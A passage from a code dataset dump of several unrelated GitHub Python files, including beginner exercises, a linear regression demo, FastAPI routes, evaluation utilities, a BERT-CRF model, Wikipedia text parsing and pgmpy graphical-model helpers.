list(x)\nprint(adult)\n\n\n","repo_name":"ASKTIME/PythonDemo","sub_path":"Day_09/12-filter的使用.py","file_name":"12-filter的使用.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"26064754833","text":"# 3.03.01_SVLR_without_Bias_Loss.py와 비교해서 이제 Loss를 넘어서 Cost를 구해서 theta를 업데이트 할거고 그로 인해서\n# 이제부터는 벡터 연산을 하게 될것이다\n# mini-batch를 전체 데이터셋인 100으로 놓고 계산했을 경우에 대한 코드\n\n# import required modules\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom dataset_generator import dataset_generator\nimport basic_nodes as basic_nodes\n\n# dataset preparation\ndataset_gen = dataset_generator()\ndataset_gen.set_coefficient([5,0])\nx_data, y_data = dataset_gen.make_dataset()\ndataset_gen.dataset_visualizer()\n\n# model implementation\nnode1 = nodes.mul_node()\n\n# square error loss implementation\nnode2 = nodes.minus_node()\nnode3 = nodes.square_node()\nnode4 = nodes.mean_node()\n\n# hyperparameter setting\nepochs = 50 # total epoch setting\nlr = 0.05 # learning rate setting\n\nth = -1 # arbitary theta (=weight)\ncost_list = []\nth_list = []\n\nfor epoch in range(epochs):\n X, Y = x_data, y_data\n # X.shape, Y.shape == (100,1) X와 Y의 데이터 개수가 100개이다\n\n # forward propagation 계산\n Z1 = node1.forward(th, X)\n Z2 = node1.forward(Y, Z1)\n L = node3.forward(Z2)\n J = node4.forward(L)\n # Z1, Z2, Le의 크기는 (100,1)이다\n # J의 크기는 (1)이다\n \n # backward propagation 계산\n dL = node4.backward(1)\n dZ2 = node3.backward(dL)\n dY, dZ1 = node2.backward(dZ2)\n dTh, dX = node1.backward(dZ1)\n # dL, dZ2, dZ1, dTh의 크기는 (100,1)이다\n\n # theta 업데이트\n th = th - lr*np.sum(dTh)\n\n th_list.append(th)\n cost_list.append(J)\n\n","repo_name":"DoubleS-Lee/Deep_learning","sub_path":"Mathmatic Basic Theory/3.05.03_SVLR_without_Bias_Cost.py","file_name":"3.05.03_SVLR_without_Bias_Cost.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71169232310","text":"#! /usr/bin/python3\n\n# Implement a web request interface to interact with Ricequant.\n\nfrom requests import Request, Session, exceptions\nimport re, json\n\nfrom . import file\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0',\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'Accept-Language': 'zh,zh-CN;q=0.7,en-US;q=0.3',\n # 'Referer': rqConfig.rqEndpointUrl,\n 'X-Requested-With': 'XMLHttpRequest',\n 'DNT': '1',\n 'Connection': 'keep-alive',\n 'Sec-Fetch-Dest': 'empty',\n 'Sec-Fetch-Mode': 'cors',\n 'Sec-Fetch-Site': 'same-origin',\n 'Pragma': 'no-cache',\n 'Cache-Control': 'no-cache',\n 'TE': 'trailers'\n }\n\ndef prepareGenericRequest(urlRoute, urlParams, headers, method, sensitive=True):\n \n webRequest = Request(method, urlRoute, params=urlParams, headers=headers)\n session = Session()\n sess = session.prepare_request(webRequest)\n \n resp = session.send(sess) # 发报\n\n return resp\n\n","repo_name":"duoduoffff/biquge-crawler","sub_path":"Utility/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29462569074","text":"from datetime import datetime\n\nfrom typing import Optional\nfrom fastapi import APIRouter, status, HTTPException\n\nfrom enums.request_status import RequestStatusEnum\nfrom dtos.pagination import Pagination\nfrom dtos.request import (\n CreateRequestPayload,\n CreateRequestResponse,\n GetRequestsQuery,\n GetRequestsResponse,\n UpdateRequestPayload,\n UpdateRequestResponse,\n)\nfrom repositories import request as RequestRepository\n\n\nrouter = APIRouter()\n\n\n@router.get(\n \"\",\n response_description=\"Retrieve requests\",\n response_model=GetRequestsResponse,\n status_code=status.HTTP_200_OK,\n)\nasync def get_requests(\n account_to: Optional[str] = None,\n account_from: Optional[str] = None,\n status: Optional[str] = None,\n kind: Optional[str] = None,\n size: Optional[int] = 10,\n page: Optional[int] = 1,\n):\n # TODO: add docstring\n\n requests, total = await RequestRepository.get_many(\n GetRequestsQuery(\n account_to=account_to,\n account_from=account_from,\n status=status,\n kind=kind,\n ),\n Pagination(size=size, page=page),\n )\n\n return GetRequestsResponse(data=requests, total=total, size=size, page=page)\n\n\n@router.post(\n \"\",\n response_description=\"Create a request\",\n response_model=CreateRequestResponse,\n status_code=status.HTTP_201_CREATED,\n)\nasync def create_request(payload: CreateRequestPayload):\n # TODO: add docstring\n # TODO: check if similar request already created\n for _, v in payload.dict().items():\n if v is None:\n raise HTTPException(\n status_code=status.HTTP_422_UNPROCESSABLE_ENTITY,\n detail=\"Request payload not complete\",\n )\n\n request = await RequestRepository.create_one(\n CreateRequestPayload(\n account_to=payload.account_to,\n account_from=payload.account_from,\n kind=payload.kind,\n payload=payload.payload,\n is_encrypted=payload.is_encrypted,\n )\n )\n\n return CreateRequestResponse(data=request)\n\n\n@router.put(\n \"/{id}/approve\",\n response_description=\"Approve request\",\n response_model=UpdateRequestResponse,\n status_code=status.HTTP_202_ACCEPTED,\n)\nasync def approve_request(id: str):\n # TODO: add docstring\n\n request = await RequestRepository.get_by_id(id)\n\n if request is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Request not found\",\n )\n\n if request.status != RequestStatusEnum.PENDING:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"Request status not pending\",\n )\n\n update = UpdateRequestPayload(\n status=RequestStatusEnum.APPROVED,\n approved_at=datetime.now(),\n )\n result = await RequestRepository.update_by_id(id, update)\n\n if result.modified_count < 1:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"Update request failed\",\n )\n\n return UpdateRequestResponse(data=request, update=update)\n\n\n@router.put(\n \"/{id}/reject\",\n response_description=\"Reject request\",\n response_model=UpdateRequestResponse,\n status_code=status.HTTP_202_ACCEPTED,\n)\nasync def reject_request(id: str):\n # TODO: add docstring\n\n request = await RequestRepository.get_by_id(id)\n\n if request is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Request not found\",\n )\n\n if request.status != RequestStatusEnum.PENDING:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"Request status not pending\",\n )\n\n update = UpdateRequestPayload(\n status=RequestStatusEnum.REJECTED,\n rejected_at=datetime.now(),\n )\n result = await RequestRepository.update_by_id(id, update)\n\n if result.modified_count < 1:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"Update request failed\",\n )\n\n return UpdateRequestResponse(data=request, update=update)\n","repo_name":"AriaHealth/tee-service-python","sub_path":"routes/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"15374635577","text":"import json\n\nimport d_time\nimport d_weather\n\ndef loadJSON(name):\n contents_file = open(name, \"r\")\n contents = contents_file.read()\n contents_file.close()\n return json.loads(contents)\n\ndef writeJSON(name, data):\n with open(name, \"w\") as fp:\n json.dump(data, fp)\n\ndef saveFunction(name, seq_id, seq_str):\n current = loadJSON(\"cmd.json\")\n\n func = {}\n func[\"id\"] = len(current)\n func[\"internal\"] = False\n func[\"trigger\"] = name\n func[\"s_id\"] = seq_id\n func[\"s_str\"] = seq_str\n\n current[name] = func\n writeJSON(\"cmd.json\", current)\n","repo_name":"js0nwu/cortana-skill-learner","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"2454845420","text":"# Exercise №1\r\ndef my_func(var_1, var_2):\r\n if var_2 == 0:\r\n try:\r\n x = var_1 // 0\r\n except ZeroDivisionError:\r\n x = 0\r\n else:\r\n x = var_1 / var_2\r\n return x\r\nnumber_1 = int(input('Введите число '))\r\nnumber_2 = int(input('Введите число '))\r\nprint('Задание 1')\r\nprint(my_func(number_1, number_2))\r\n# Exercise №2\r\ndef my_func_1(var_2, var_1, var_3, var_4, var_5, var_6):\r\n var_1 = input('Введите имя ')\r\n var_2 = input('Введите фамилию ')\r\n var_3 = input('Введите год рождения ')\r\n var_4 = input('Введите город проживания ')\r\n var_5 = input('Введиет email ')\r\n var_6 = input('Введите телефон ')\r\n return var_2, var_1, var_3, var_4, var_5, var_6\r\nprint('Задание 2')\r\nprint(my_func_1(var_1=10, var_2=12, var_3=13, var_4=14, var_5=15, var_6=11))\r\n# Exercise №3\r\ndef my_func_3(var_1, var_2, var_3):\r\n if (var_1 + var_2) > (var_2 +var_3):\r\n x = (var_1+var_2)\r\n else :\r\n x = var_2 + var_3\r\n if x > (var_3 + var_1):\r\n x = x\r\n else:\r\n x = var_3 + var_1\r\n return x\r\nprint('Задание 3')\r\nprint(my_func_3(1, 4, 3))\r\n# Exercise 4\r\ndef my_func_4(var_1, var_2):\r\n result = var_1 ** var_2\r\n return result\r\nprint('Задание 4')\r\nprint(my_func_4(3, -1))\r\ndef my_func_4_1(var_1,var_2):\r\n res = 1\r\n for i in range(abs(var_2)):\r\n res *= var_1\r\n if var_2 >= 0:\r\n return res\r\n else:\r\n return 1 / res\r\nprint(my_func_4_1(3, -2))\r\n# Exercise 5\r\ndef my_func_5(*args):\r\n x = input('Введите числа ').split()\r\n y = len(x)\r\n sum = 0\r\n while y != 0 :\r\n y = y - 1\r\n b = int(x[y])\r\n sum += b\r\n return sum\r\nprint('Задание 5')\r\nprint(my_func_5('next'))\r\n# Exercise 6\r\ndef int_func(var_1):\r\n var_1 = var_1.title()\r\n return var_1\r\nprint('Задание 6')\r\nprint(int_func('text notext super'))\r\ndef int_func(var_1):\r\n var_1 = var_1.title()\r\n return var_1\r\nprint(int_func(input('Введите слова в нижнем регистре ')))\r\n","repo_name":"NikitaSmol67/homeWork-1","sub_path":"homework 3.py","file_name":"homework 3.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"74640314870","text":"import numpy as np\nimport pandas as pd\nimport seaborn as sn\nimport matplotlib.pyplot as plt\nimport sklearn.cluster as sk\nimport sklearn.metrics as metrics\n\ndef evalAccuracy(col_predict, col_label):\n \"\"\"\n evalAccuracy\n ----------------------------------------------------------\n Find accuracy given estimated classes and actual classes\n ----------------------------------------------------------\n Parameters:\n - col_predict: array containing the predicted classes\n - col_label: array containing the actual labels\n ----------------------------------------------------------\n Outputs:\n - accuracy (float)\n \"\"\"\n if (len(col_predict.shape) > 1 or len(col_label.shape) > 1):\n if (not all(col_predict.shape[1:] == 1) or not all(col_label.shape[1:] == 1)):\n raise ValueError(\"The passed arrays are not 1D\")\n \n n_elem = col_predict.shape[0]\n if (col_label.shape[0] != n_elem):\n raise ValueError(\"The two arrays don't have the same length!\")\n\n n_classes = len(np.unique(col_label))\n tmp_sum = np.zeros((n_classes,))\n tmp_tot = np.zeros((n_classes,))\n \n for i in range(n_elem):\n tmp_tot[int(col_label[i])-1] += 1\n if col_label[i] == col_predict[i]:\n tmp_sum[int(col_label[i])-1] += 1\n\n accuracy = (1/19) * np.sum(tmp_sum/tmp_tot)\n\n return accuracy\n\n\ndef evalAccuracyClasses(col_predict, col_label):\n \"\"\"\n Find accuracy value for each class\n ----------------------------------------------------------\n Parameters:\n - col_predict: array containing the predicted classes\n - col_label: array containing the actual labels\n ----------------------------------------------------------\n Outputs:\n - accuracy (ndarray)\n \"\"\"\n if (len(col_predict.shape) > 1 or len(col_label.shape) > 1):\n if (not all(col_predict.shape[1:] == 1) or not all(col_label.shape[1:] == 1)):\n raise ValueError(\"The passed arrays are not 1D\")\n \n n_elem = col_predict.shape[0]\n if (col_label.shape[0] != n_elem):\n raise ValueError(\"The two arrays don't have the same length!\")\n \n n_classes = len(np.unique(col_label))\n tmp_sum = np.zeros((n_classes,))\n tmp_tot = np.zeros((n_classes,))\n\n for i in range(len(col_label)):\n tmp_tot[int(col_label[i])-1] += 1\n if col_label[i] == col_predict[i]:\n tmp_sum[int(col_label[i])-1] += 1\n \n acc_classes = tmp_sum/tmp_tot\n\n return acc_classes\n\n\n\n\ndef plotConfusionMatrix(col_predict, col_label, class_names, title='Confusion Matrix', save_img=False, img_path='./img/conf_matrix.png'):\n \"\"\"\n plotConfusionMatrix\n ----------------------------------------------------------\n Plot the confusion matrix\n ----------------------------------------------------------\n \"\"\"\n cm = metrics.confusion_matrix(col_label, col_predict, normalize='true')\n cm_df = pd.DataFrame(cm, index=class_names, columns=class_names)\n \n plt.figure(figsize=(10, 8))\n ax = sn.heatmap(cm_df, annot=True, cmap='BuPu')\n ax.set_xlabel(\"Predicted class\")\n ax.set_ylabel(\"True class\")\n plt.title(title)\n if save_img:\n plt.savefig(img_path)\n plt.tight_layout()\n plt.show()\n\n return cm\n\n\n\ndef interCentroidDist(centroids, cent_names_axis, plot=False, save_img=False, img_path='img/inter_centroid_dist.png'):\n \"\"\"\n interCentroidDist\n ----------------------------------------------------------\n Evaluate (and plot) the matrix containing as element i,j\n the distance between centroid i and centroid j\n ----------------------------------------------------------\n Parameters:\n - centroids: matrix containing the centroids as rows\n - cent_name_axis: list containing the names of the \n centroids (used as labels of the plot)\n - plot: boolean flag for plotting\n - save_img: boolean flag for saving the image\n - img_path: path indicating where to store the image\n ----------------------------------------------------------\n Outputs:\n - d: square matrix containing in element i, j the distance \n (norm) between element i and element j\n \"\"\"\n \n # Element i, j is squared norm of dist between centroid i and j\n NAc = centroids.shape[0]\n \n d = np.zeros((NAc, NAc))\n\n for i in range(NAc):\n for j in range(i+1, NAc): # Optimization - diagonal elements are 0 and matrix is symmetric\n d[i, j] = np.linalg.norm(centroids[i] - centroids[j])\n d[j, i] = d[i, j]\n\n if plot:\n plt.matshow(d)\n plt.colorbar()\n plt.xticks(np.arange(NAc), cent_names_axis, rotation=90)\n plt.yticks(np.arange(NAc), cent_names_axis)\n plt.title('Between-centroids distance')\n if save_img:\n try:\n plt.savefig(img_path)\n except:\n plt.savefig('lab04/'+img_path)\n plt.show()\n\n return d\n\ndef minCentDist(centroids, cent_dist_matrix = None):\n \"\"\"\n minCentDist\n ----------------------------------------------------------\n Used to find the minimum distance between each centroid \n and all others.\n ----------------------------------------------------------\n Parameters:\n - centroids: matrix containing the centroids as rows\n - cent_dist_matrix: squared matrix of distances between \n centroids\n ----------------------------------------------------------\n Outputs:\n - dmin: ndarray minimum distance between each centroid and \n all others\n \"\"\"\n if cent_dist_matrix is None:\n d = interCentroidDist(centroids, cent_names_axis = None)\n else:\n d = cent_dist_matrix\n\n NAc = centroids.shape[0]\n\n dd = d+np.eye(NAc)*(2*d.max()) # Set distance with itself (=0) to a large value (won't be the min)\n\n dmin = dd.min(axis=0) # Find the minimum distance for each centroid\n\n return dmin\n\ndef avgDistCent(stdpoints):\n \"\"\"\n avgDistCent\n ----------------------------------------------------------\n Evaluate the average distance between the centroids and \n all points of the same cluster\n ----------------------------------------------------------\n Parameters:\n - stdpoints: matrix of standard deviations (w.r.t. \n centroids) for each cluster\n ----------------------------------------------------------\n Outputs:\n - dpoints: ndarray containing for each cluster the average \n distance\n \"\"\"\n # Average distance between each centroid and its points \n dpoints = np.sqrt(np.sum(stdpoints**2, axis=1))\n return dpoints\n\ndef centroidSeparationPlot(centroids, stdpoints, cent_names_axis, save_img=False, img_path='img/centroid_sep.png'):\n \"\"\"\n centroidSeparionPlot\n ----------------------------------------------------------\n Plot the comparison between minimum inter-centroid \n distance and average distance between centroids and each \n element of the corresponding cluster\n ----------------------------------------------------------\n Parameters:\n - centroids: matrix containing the centroids as rows\n - stdpoints: matrix of standard deviations (w.r.t. \n centroids) for each cluster\n - cent_name_axis: list containing the names of the \n centroids (used as labels of the plot)\n - save_img: boolean flag for saving the image\n - img_path: path indicating where to store the image\n \"\"\"\n NAc = centroids.shape[0]\n\n dmin = minCentDist(centroids)\n dpoints = avgDistCent(stdpoints)\n\n plt.figure()\n plt.plot(dmin, label='minimum centroid distance')\n plt.plot(dpoints, label='mean distance from points to centroid')\n plt.grid()\n plt.xticks(np.arange(NAc), cent_names_axis, rotation=90)\n plt.legend()\n plt.title('Centroid separation plot')\n plt.tight_layout()\n if save_img:\n plt.savefig(img_path)\n plt.show()\n\n","repo_name":"davmacario/ICTforHealth","sub_path":"lab04/sub/evaluators.py","file_name":"evaluators.py","file_ext":"py","file_size_in_byte":7824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31824125586","text":"\"\"\"\nWhile instance attributes are specific to each object,\nclass attributes are the same for all instances\n\"\"\"\n\n\nclass Person:\n species = \"mammal\" # Here is the class Attribute\n\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n\nme = Person(\"George\", 25)\nyou = Person(\"John\", 44)\n\nprint(me.name, me.age, me.species) # me.species\nprint(you.name, you.age, you.species) # you.species\n\nprint()\nprint()\nprint()\nprint()\nprint()\n\n\nclass Person2:\n species = \"mammal\" # Here is the class Attribute\n\n def __init__(self, name, age, kg):\n self.name = name\n self.age = age\n self.kg = kg\n\n def eat(self):\n print(\"eating\")\n self.kg += 0.30\n\n\nme2 = Person2(\"George\", 25, 70)\nprint(me2.kg)\nme2.eat()\nprint(me2.kg)\n\n\nprint()\nprint()\nprint()\nprint()\nprint()\n\n\nclass Person3:\n def __init__(self, first_name, last_name, age):\n self.first_name = first_name\n self.last_name = last_name\n self.age = age\n\n def get_full_name(self):\n return f\"{self.first_name} {self.last_name}\"\n\n\nme3 = Person3(\"Peter\", \"Johnson\", 64)\nprint(me3.get_full_name())\n","repo_name":"GGI81/Python-fundamentals","sub_path":"Objects and Classes Lab/class Attributes.py","file_name":"class Attributes.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"33176816321","text":"import sys \n\n# sys.stdin = open(\"input\",\"r\") \n\nfrom collections import *\nfrom heapq import * \nfrom functools import *\nfrom math import *\n\nt = int(input())\nfor _ in range(t):\n n, m = list(map(int,input().split()))\n s = input()\n s = list(map(int,s))\n tot = n*m \n ans = [0]*tot \n cols = [0]*tot \n for i in range(tot):\n pre = cols[i-m] if i-m >= 0 else 0 \n cols[i] = pre|s[i]\n # print(cols)\n cnt = 0\n for i in range(tot):\n cnt += cols[i]\n if i-m >= 0:\n cnt -= cols[i-m] \n ans[i] += cnt \n # print(ans)\n rows = [0]*(tot+1)\n for i in range(tot):\n rows[i] = s[i]+rows[i-1]\n for i in range(tot)[::-1]:\n if i-m >= 0:\n rows[i] -= rows[i-m]\n # print(rows)\n for i in range(tot):\n rows[i] = 1 if rows[i] else 0\n if i-m >= 0:\n rows[i] += rows[i-m]\n ans[i] += rows[i]\n # print(rows)\n print(*ans)\n\n","repo_name":"zhenfelix/OnlineJudgeCodings","sub_path":"Codeforces/1677B - Tokitsukaze and Meeting.py","file_name":"1677B - Tokitsukaze and Meeting.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"40826248266","text":"import gzip\nimport json\nimport re\n\n\n\n# with open(\"./jawiki-country.json\") as f:\n# jsonData = json.load(f)\n\n # print(jsonData)\ndef extraction(target):\n with gzip.open(\"./jawiki-country.json.gz\",'rt') as f:\n for line in f.readlines():\n json_data = json.loads(line)\n if json_data[\"title\"] == target:\n return json_data[\"text\"]\n\n\ntext = extraction(\"イギリス\")\npattern = r'\\|(?P<key>.*?) = (?P<value>.*)'\nprog = re.compile(pattern)\n# for line in text.split('\\n'):\n# result = prog.match(line)\n# if(result!=None):\n# dic[result.group(\"key\")] = result.group(\"value\")\ndic = dict((prog.match(line).group(\"key\"),prog.match(line).group(\"value\")) for line in text.split('\\n') if prog.match(line)!= None)\n# for key, value in dic.items():\n# print(key,value,sep=' : ')\n# print()\n\n\n\nreplace_pattern = r\"(?P<text>''+.*?''+)\"\nreplace = re.compile(replace_pattern)\nfor key, value in dic.items():\n text = replace.search(value)\n if text != None:\n # print(text.group(\"text\"))\n # print(value)\n value = replace.sub(text.group(\"text\").replace(\"'\",''),value)\n # print(value)\n dic[key] = value\n\n# for key,value in dic.items():\n# print(key,value,sep=' : ')\n# print()\n\n\ndef repl(matchobj):\n if matchobj.group().find('|') == -1:\n return matchobj.group().replace('[','').replace(']','')\n else:\n pattern = r\"\\|(?P<text>.*?)\\]\\]\"\n prog = re.compile(pattern)\n result = prog.search(matchobj.group())\n return result.group(\"text\")\n\nreplace_pattern = r\"\\[\\[(?P<text>(?!ファイル:).*?)\\]\\]\"\nreplace = re.compile(replace_pattern)\nfor key, value in dic.items():\n value = replace.sub(repl,value)\n dic[key] = value\n\n\n\ndef repl1(matchobj):\n return ''\n\ndef repl2(matchobj):\n return matchobj.group(\"text\")\n\ndef repl3(matchobj):\n return matchobj.group(\"text\")\n\npattern1 = r\"<.*>\"\npattern2 = r\"\\{\\{.*\\|(?P<text>.*?)\\}\\}\"\npattern3 = r\"\\[\\[ファイル:.*\\|(?P<text>.*?)\\]\\]\"\nprog1 = re.compile(pattern1)\nprog2 = re.compile(pattern2)\nprog3 = re.compile(pattern3)\nfor key,value in dic.items():\n value = prog1.sub(repl1,value)\n value = prog2.sub(repl2,value)\n value = prog3.sub(repl3,value)\n dic[key] = value\n\n# for key,value in dic.items():\n# print(key,value,sep=' : ')\n\n\n\n\n\nimport requests\n\nS = requests.Session()\n\nURL = \"https://en.wikipedia.org/w/api.php\"\n\nPARAMS = {\n \"action\": \"query\",\n \"format\": \"json\",\n \"prop\": \"imageinfo\",\n \"titles\": \"File:Flag_of_the_United_Kingdom.svg\"\n}\n\nR = S.get(url=URL, params=PARAMS)\nDATA = R.json()\n\nPAGES = DATA[\"query\"][\"pages\"]\n\nfor k, v in PAGES.items():\n print(v[\"title\"] + \" is uploaded by User:\" + v[\"imageinfo\"][0][\"user\"])\n\n\ndef printdict(dic,count):\n if(type(dic)==dict):\n for key, value in dic.items():\n print('\\t'*count,key)\n printdict(value,count+1)\n elif type(dic) == list:\n for a in dic:\n printdict(a,count)\n else:\n print(dic)\n\nprintdict(DATA,1)\nprint(DATA[\"query\"][\"pages\"][\"23473560\"][\"pageid\"][\"imageinfo\"][\"user\"])\n\n","repo_name":"matatabinoneko/nlp_100_knock","sub_path":"section03/29.py","file_name":"29.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"34341239305","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nimport time\nimport numpy as np\n\n#import linalg de tinh tri rieng va vecto tieng\nfrom numpy import linalg as LA\n\n\n# #load excel dataframe\n# fields =['Power (W)','Laser Speed (mm/s)','Hatch Spacing (mm)','Layer Thickness (mm)','Energy Density (J/mm^3)','XY/YZ Density Avg']\n\n\nfields =['Power (W)','Laser Speed (mm/s)','Hatch Spacing (mm)','Layer Thickness (mm)','Energy Density (J/mm^3)']\n# doc du lieu tu file excel\nmyDf = pd.read_excel('Data.xlsx')\n\n#load cac cot du lieu tu array\nmyDf = myDf[fields]\n\n#goi cac cau lenh tinh gia tri rieng va phuong sai\nprint(\"Ma trận hiệp phương sai: \")\ncov =np.array(myDf.cov())\n\nprint(myDf.cov())\nprint(\"____________________________________________________\")\nprint(\"Các cặp trị riêng và vecto riêng tương ứng: \")\nw, v = LA.eig(cov)\n\n#tinh thanh phan chinh cua chuoi\n\nfor i in range(0,len(w)):\n\tprint(\"w_\"+str(i+1)+\" = \"+str(round(w[i],2))+\",v_\"+str(i+1)+\" = \"+str(np.around(v[i],decimals=1)))\n\n\nprint(\"Các thành phần chính tương ứng: \")\nfor i in range(0,len(v)):\n\toutput = \"Y_\"+str(i+1)+\" = \"\n\tfor j in range(0,len(v[0])):\n\t\tif j == 0 or '-' in str(round(v[i][j],2)):\n\t\t\toutput = output + str(round(v[i][j],2)) + \"X_\"+str(j+1)\n\t\telse:\n\t\t\toutput = output +\" + \"+ str(round(v[i][j],2)) + \"X_\"+str(j+1)\n\n\tprint(output)\nw2 = w/sum(w)\n\n\nprint(\"Độ sai số tương ứng: \")\nprint(np.around(w2, decimals=2))\n\n# tinh he so tuong quan\nprint(\"________________________________________________________\")\nprint(myDf.corr())","repo_name":"ttdung997/Data-mining-assistant","sub_path":"Basic/numpy-example.py","file_name":"numpy-example.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"72485459516","text":"from torchcrf import CRF\nfrom torch import nn\nfrom transformers import BertModel, BertPreTrainedModel\nfrom config import need_rnn\n\n\nclass Bert_BiGru_Crf(BertPreTrainedModel):\n def __init__(self, config, need_birnn=need_rnn, rnn_dim=128, label_num=13):\n super().__init__(config)\n self.bert = BertModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.need_birnn = need_birnn\n if need_birnn:\n self.gru = nn.GRU(768,\n rnn_dim,\n num_layers=2,\n bidirectional=True,\n dropout=.3,\n batch_first=True\n )\n self.fc = nn.Linear(rnn_dim * 2, label_num) # BOS EOS\n else:\n self.fc = nn.Linear(config.hidden_size, label_num)\n self.crf = CRF(label_num, batch_first=True)\n\n def forward(self, text, label):\n out = self.bert(input_ids=text['input_ids'], attention_mask=text['attention_mask']).last_hidden_state\n if self.need_birnn:\n out, _ = self.gru(out)\n out = self.dropout(out)\n output = self.fc(out)\n loss = -self.crf(output, label, mask=text['attention_mask'].byte())\n return loss\n\n def predict(self, text):\n \"\"\" 实现其predict接口\n\n :param text: 输入文本的input_ids、attention_mask\n :return: decode解码的类别\n \"\"\"\n out = self.bert(input_ids=text['input_ids'], attention_mask=text['attention_mask']).last_hidden_state\n if self.need_birnn:\n out, _ = self.gru(out)\n\n out= self.dropout(out)\n output = self.fc(out)\n pred = self.crf.decode(output, text['attention_mask'].byte())\n\n return pred\n","repo_name":"yang-collect/bert-bigru-crf","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"31000391069","text":"import numpy as np\nimport copy\nimport pgmpy.factors\nfrom pgmpy.models import BayesianNetwork, MarkovNetwork\nfrom pgmpy.factors.discrete import TabularCPD, DiscreteFactor\nfrom pgmpy.factors import factor_product\nfrom pgmpy.inference import VariableElimination\n\n\ndef eliminate_variable(m, i):\n \"\"\"\n Eliminates one variable of an MRF in place.\n\n :param m: a `pgmpy.models.MarkovNetwork`\n :param i: name of the node to eliminate\n \"\"\"\n\n assert isinstance(m, MarkovNetwork)\n\n factors = [f for f in m.get_factors() if i in f.variables]\n f = pgmpy.factors.factor_product(*factors)\n pos = f.variables.index(i)\n f.values = np.sum(f.values, axis=pos)\n f.cardinality = np.delete(f.cardinality, pos)\n del f.variables[pos]\n m.add_factors(f)\n for u in range(len(f.variables)-1):\n for v in range(u+1, len(f.variables)):\n m.add_edge(f.variables[u], f.variables[v])\n m.remove_factors(*factors)\n m.remove_node(i)\n # m.check_model()\n\n\ndef full(m):\n \"\"\"\n Compute the full factor product of all variables in the model\n\n :param m: an MRF (pgmpy.models.MarkovNetwork)\n :return: an np.ndarray with shapes according to the model's inputs\n \"\"\"\n\n m.check_model()\n\n factor = m.factors[0]\n factor = factor_product(\n factor, *[m.factors[i] for i in range(1, len(m.factors))]\n )\n if set(factor.scope()) != set(m.nodes()):\n raise ValueError(\"DiscreteFactor for all the random variables not defined.\")\n return factor\n\n\ndef remove_non_ancestors(b, inputs):\n \"\"\"\n Given a Bayesian network, create a copy that includes the inputs and their ancestors, but removes non-ancestor nodes.\n\n :param b: a `pgmpy.models.BayesianNetwork`\n :param inputs: list of nodes\n :return: a `pgmpy.models.BayesianNetwork`\n \"\"\"\n\n assert isinstance(b, BayesianNetwork)\n\n visited = set()\n to_visit = set(inputs)\n edges = []\n cpds = []\n while len(to_visit) > 0:\n new = to_visit.pop()\n visited.add(new)\n cpd = b.get_cpds(new)\n cpds.append(copy.deepcopy(cpd))\n for parent in cpd.variables[1:]:\n if parent not in visited and parent not in to_visit:\n to_visit.add(parent)\n edges.append([parent, new])\n b = BayesianNetwork(edges)\n for n in visited:\n b.add_node(n)\n b.add_cpds(*cpds)\n return b\n\n\ndef multiply_mms(u, v, inputs):\n \"\"\"\n Multiply two MRFs u and v so that, if Z(m) marginalizes an MRF m over `inputs`,\n Z(product) = Z(u)*Z(v).\n\n :param u: a `pgmpy.models.MarkovNetwork`\n :param v: a `pgmpy.models.MarkovNetwork`\n :return: a `pgmpy.models.MarkovNetwork`\n \"\"\"\n\n assert all([i in u.nodes for i in inputs])\n assert all([i in v.nodes for i in inputs])\n\n def add_data(m, suffix):\n\n for n in list(m.nodes):\n if n not in inputs:\n nodes.add(n+suffix)\n\n for e in list(m.edges):\n if e[0] in inputs and e[1] in inputs:\n edges.add((e[0], e[1]))\n else:\n newedge = []\n for n in e:\n if n in inputs:\n newedge.append(n)\n else:\n newedge.append(n+suffix)\n edges.add((newedge[0], newedge[1]))\n\n for f in list(m.get_factors()):\n newvariables = []\n for n in f.variables:\n if n in inputs:\n newvariables.append(n)\n else:\n newvariables.append(n+suffix)\n newf = DiscreteFactor(newvariables, 